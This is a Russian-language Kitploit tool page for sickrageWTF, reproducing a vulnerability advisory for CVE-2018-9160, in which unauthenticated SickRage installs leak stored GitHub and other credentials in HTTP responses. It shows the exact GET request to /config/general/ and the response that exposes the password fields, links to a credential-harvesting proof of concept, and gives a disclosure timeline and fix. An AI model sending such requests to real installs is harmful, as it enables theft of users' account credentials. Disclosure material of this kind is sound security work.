Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sickrageWTF — CVE-2018-9160 | Kitploit
Инструменты/GitHubGitHub/mechanico/sickragewtf
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

Репозиторий
8 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Sickrage: учётные данные GitHub в открытом виде CVE-2018-9160


  1. About

Название эксплойта: Учётные данные SickRage в открытом виде в HTTP-ответе
Дата: 2018-04-01
Автор эксплойта: Sven Fassbender
Контакт: https://twitter.com/mezdanak
Домашняя страница производителя: https://sickrage.github.io
Ссылка на ПО: https://github.com/SickRage/SickRage
Версия: < v2018.03.09-1
CVE : CVE-2018-9160
Категория: webapps


  1. Background information

«SickRage — это автоматический менеджер видеотеки для телесериалов.
Он отслеживает появление новых серий ваших любимых шоу и, когда они публикуются, делает своё дело:
автоматический поиск торрентов/nzb, загрузка и обработка в нужном вам качестве». — выдержка из https://sickrage.github.io


  1. Vulnerability description

SickRage возвращает учётные данные в открытом виде, например, для GitHub, AniDB, Kodi, Plex и т. д., в HTTP-ответах.
Предпосылкой является то, что пользователь не установил имя пользователя и пароль для своей установки SickRage (необязательно, по умолчанию).

HTTP-запрос:

root@kitploit:~
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

HTTP-ответ:

root@kitploit:~
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. Proof of Concept

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. Timeline

[2018-03-07] Уязвимость обнаружена
[2018-03-08] Связались с производителем
[2018-03-08] Производитель ответил
[2018-03-09] Уязвимость устранена. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. Recommendation

Обновите установку SickRage до v2018.03.09-1 или более поздней версии.
Защитите доступ к веб-приложению с помощью надлежащих учётных данных пользователя.


Скачать инструмент